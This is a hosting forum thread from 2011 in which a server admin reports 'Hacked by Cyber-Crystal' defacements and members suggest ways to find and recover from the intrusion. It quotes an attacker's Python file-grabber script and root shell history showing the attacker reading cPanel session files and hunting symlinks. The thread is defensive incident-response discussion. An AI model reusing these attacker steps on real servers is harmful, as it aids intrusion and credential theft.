hosted by liquidweb


Go Back   Web Hosting Talk : Web Hosting Main Forums : Hosting Security and Technology : Hacked by Cyber-Crystal
Reply

Forum Jump

Hacked by Cyber-Crystal

Reply Post New Thread In Hosting Security and Technology Subscription
 
Send news tip View All Posts Thread Tools Search this Thread Display Modes
  #1  
Old 12-06-2011, 04:18 PM
Dig1 Dig1 is offline
WHT Addict
 
Join Date: Mar 2011
Location: florida
Posts: 155

Hacked by Cyber-Crystal


A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
the page will say Hacked by CYBER-CRYSTALL
I googled and have noticed thousands of sites are being currently attacked this way
My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks



Sponsored Links
  #2  
Old 12-07-2011, 05:34 AM
mike86 mike86 is offline
Web Hosting Master
 
Join Date: Mar 2011
Location: Edinburgh, UK
Posts: 565
Someone has managed to upload files to your webserver directory. What OS and webserver are you using? Check your webserver logs to see how the files were added.

  #3  
Old 12-07-2011, 05:48 AM
PlotHost-Max PlotHost-Max is online now
Web Hosting Master
 
Join Date: Jun 2007
Posts: 1,002
Indeed, you should check the server logs. Also update the script you are using (wordpress etc) to the latest version.

__________________
PlotHost - Cheap Web Hosting Plans since 2008
24/7 Support | 99.9% Uptime | 15 Days Money Back
Shared & Reseller Plans - Check our hosting OFFER !


Sponsored Links
  #4  
Old 12-09-2011, 09:09 AM
Lee-RackSRV Lee-RackSRV is offline
Junior Guru
 
Join Date: Jul 2011
Location: Sittingbourne, Kent, UK
Posts: 194
Check server access logs for successful logins:

last
cat /var/log/secure* | grep ssh | grep Accept
cat /var/log/secure* |grep ftp |grep Accept
less /var/log/messages | grep ftp

Once done check for hidden dirs:

updatedb
locate "..."
locate ".. "
locate " .."
locate ". "
locate " ."

Assuming you find nothing suspicious here, start checking access logs and such for suspicious items, ensure you check for rootkits also.

I'm afraid it's more likely that your personal computer has been exploited and an FTP client that saves passwords in clear text has allowed these details to be compromised.

Failing this check the server for possible exploits / out of date software.

Good luck with your search I hope you keep us up to date.

__________________
RackSRV Communications Limited
UK specialists in Dedicated Servers & Server Colocation
Company: 06856870 VAT: GB 934 7073 15 Tel: 0330 111 4444

  #5  
Old 12-09-2011, 10:56 AM
amigoserv amigoserv is offline
Disabled
 
Join Date: Nov 2011
Location: Egypt
Posts: 16
Check scripts on your sites that allow uploading maliciuos files

I think this hacker can't do anything except adding his index files only not sql injection or others

so I recommended to secure your server with firewall CSF and modsecurity

  #6  
Old 12-09-2011, 11:07 AM
lynxus lynxus is offline
Lord of live chats
 
Join Date: Jul 2009
Location: UK
Posts: 1,295
My first port of call would be to look at the FTP logs if a lot of people have been done the same way.

My second look would be at any kind of 3rd party scripts that a lot of other people may use ( Wordpress, Mailer scripts, Monitoring scripts , etc etc.. )

Its evidently a generic hack that a lot of people are vuln for.

__________________
Live Chat Support Software for your Business website - IMsupporting.com

  #7  
Old 12-09-2011, 09:45 PM
ioTerrence ioTerrence is offline
Newbie
 
Join Date: Jul 2010
Location: Salt Lake City, Utah
Posts: 5
A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

Please lemme know if you find anything I've missed!


Last edited by ioTerrence; 12-09-2011 at 09:48 PM. Reason: Corrected host's url.
  #8  
Old 12-09-2011, 09:51 PM
Dawg Dawg is offline
Junior Guru Wannabe
 
Join Date: Jan 2004
Location: Texas
Posts: 79
Quote:
Originally Posted by Dig1 View Post
A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
the page will say Hacked by CYBER-CRYSTALL
I googled and have noticed thousands of sites are being currently attacked this way
My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks
Holy cow. A google search renders hundreds of hacked sites. Looks like someone needs to get a life.

  #9  
Old 12-09-2011, 10:03 PM
ioTerrence ioTerrence is offline
Newbie
 
Join Date: Jul 2010
Location: Salt Lake City, Utah
Posts: 5
Also came across this code floating around online, thanks to the email address they left behind. I don't know anything about Python, but if I'm interpreting it right, part of it is some kind of URL fetcher?

#!/usr/bin/python
# mekad By Cyber-Crystal
#
# Cyb3r.Crystal@Gmail.com

# tryag.cc

import urllib2,re
raw = raw_input('URL CONF : ')
url = urllib2.urlopen(raw)
data = url.read()
finddata = re.findall('href="(.*?)">',data)
for cyb3r in range(len(finddata)):
try:
filecon = open(finddata[cyb3r],'a')
done = urllib2.urlopen(raw+finddata[cyb3r])
wewe = done.read()
print "Witteng ....\n"
filecon.write(wewe)
print "Done "
except IOError:
print "error"

  #10  
Old 12-11-2011, 12:31 PM
Dig1 Dig1 is offline
WHT Addict
 
Join Date: Mar 2011
Location: florida
Posts: 155
UPDATE

Yes and in the /etc/httpd/conf they also added 5 files named 1.pl 2.pl 3.pl etc
So i figured they had to have accessed root someway and did this and added the files
in roots bash history >
ls -l /etc/valiases
cd /etc/valiases
ls -la /etc/valiases
ls -la /etc/valiases/
cd /usr/loca/apache
cd /etc/httpd/conf
cat httpd.conf | grep DocumentRoot
nano 1.pl
pico 1.pl
nano 1.pl
yum install nano
nano 1.pl
perl 1.pl
nano 2.pl
perl 2.pl
nano 3.pl
perl 3.pl
ifconfig
nano 4.pl
perl 4.pl
exit
pdw
pwd
ls
locate index.html
cd /var/www
ls
cd html
ls
cd ..
cd /usr/local/apache
cd /usr/local
ls
cd /etc/httpds
cd /etc/httpd
ls
cd conf
cat httpd.conf | grep DocumentRoot
cat /var/cpanel
cat * /var/cpanel/sessions
dec6find /home*/*/public_html -type l
........
So of instead of looking for any more compromised files i reinstalled the os and added Server Security Harding like >
rkhunter,denyhost,fail2ban,Mod_security,AIDE (Advanced Intrusion Detection Environment),and locked down httpd config (file indexing ) an / access also Made Root nologin except by SU thru a special user with a passwd of 16 char , numbers and punctuation also tightened PHP and MYSQL security
I reloaded from backup all customers websites and all is well for now
my iptables have grown quite a bit
a few country bans were atoadded and denyhost has added to deny host file also
I am a little more confident now!

  #11  
Old 12-11-2011, 12:36 PM
lynxus lynxus is offline
Lord of live chats
 
Join Date: Jul 2009
Location: UK
Posts: 1,295
Quote:
Originally Posted by Dig1 View Post
So of instead of looking for any more compromised files i reinstalled the os and added Server Security Harding
Probably the best thing.

- You have identified whats going on and what level of compromise you have had.
- You have taken the best action possible and re-installed now knowing what to look out for.

Only if everyone followed the same method. I see too many posts about people "fixing" a hacked server and leaving it running..

__________________
Live Chat Support Software for your Business website - IMsupporting.com

  #12  
Old 12-11-2011, 02:15 PM
Dig1 Dig1 is offline
WHT Addict
 
Join Date: Mar 2011
Location: florida
Posts: 155
ty yup yup

  #13  
Old 12-12-2011, 06:25 AM
iLoveHosting-UK iLoveHosting-UK is offline
Web Hosting Master
 
Join Date: May 2010
Posts: 647
Quote:
Originally Posted by Dig1 View Post
A number of websites on my shared hosting have been hacked and replaced with 1 page and files added index.htm, index.php,index.html
the page will say Hacked by CYBER-CRYSTALL
I googled and have noticed thousands of sites are being currently attacked this way
My ? is what Security can i do to prevent this hack and where did i miss securing my host/websites from these kind of attacks
If it only a number of sites been hacked it could be due to unsecure versions of software. If it was all of the sites im sorry to say but you have been rooted.

- Ashton

__________________
Ashton Allen | FuseWeb Limited
Premium UK Webhosting
| Shared Hosting | VPS | Reseller Hosting | VOIP |
FuseWeb.co.uk Or follow us on Twitter

  #14  
Old 12-12-2011, 07:26 PM
SafeSrv SafeSrv is offline
Junior Guru
 
Join Date: Apr 2008
Location: UK
Posts: 235
If he can switch directories and read files your server is not setup properly - and just installing the server software you mentioned may not even be enough, it all has to be configured correctly to be effective.

And btw - this certainly looks like a real SKID

__________________
SafeSrv.net - Secure Hosting, VPN and Management Services.
WHMCS FreeRADIUS VPN Module. - Build a fully featured VPN business in no time.

  #15  
Old 12-12-2011, 07:36 PM
iexo iexo is offline
Disabled
 
Join Date: Feb 2006
Location: Global
Posts: 1,629
Quote:
Originally Posted by ioTerrence View Post
A shared host I'd just signed up with a day or two ago (AFMU.com) was hit by this person too. I hadn't set anything up on the site, and from what I could tell there were only three files uploaded (index.htm, index.html, and I forgot the otherone- was in the rootdir).

Haven't found any hidden dirs or files yet. If they hadn't left such a crappy embedded song, I would have been more amused.

Please lemme know if you find anything I've missed!
I liked that song.

Reply

Similar Threads
Thread Thread Starter Forum Replies Last Post
eCloud Hosting Cyber WEEK Blowout | Cyber Monday is now Cyber Week | HUGE SAVINGS! Dedispec Dedicated Hosting Offers 0 11-30-2010 04:46 AM
Twitter's been hacked by "Iranian Cyber Army" Funkadelic Providers and Network Outages and Updates 4 12-18-2009 04:04 AM
Crystal reports Pablasso Programming Discussion 0 02-13-2005 10:30 PM
Crystal Stream Co-op csnetcrystal Web Site Reviews 1 09-23-2004 04:09 PM
crystal Ball islandmarket Web Hosting 6 10-07-2002 04:43 PM

Related posts from TheWhir.com
Title Type Date Posted
FBI, NSA and US Secret Service Investigate Hacks at Five US Banks Web Hosting News 2014-08-28 11:59:29
Cyberthreat Information Sharing Doesn't Break Antitrust Law: Feds Web Hosting News 2014-05-01 08:34:01
UK Companies Need to Take Cybersecurity More Seriously: Government Report Web Hosting News 2013-11-27 11:32:54
Cyber Host Pro LTD Listing 2014-09-20 20:47:10
Could Website Hackers be Chasing Hosting Customers Away? Blog 2013-08-27 09:07:42


Thread Tools Search this Thread
Search this Thread:

Advanced Search
Display Modes
Postbit Selector

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off

Forum Jump
Login:
Log in with your username and password
Username:
Password:



Forgot Password?
Advertisement:
Web Hosting News:
WHT Membership
WHT Membership



 

X

Welcome to WebHostingTalk.com

Create your username to jump into the discussion!

WebHostingTalk.com is the largest, most influentual web hosting community on the Internet. Join us by filling in the form below.


(4 digit year)

Already a member?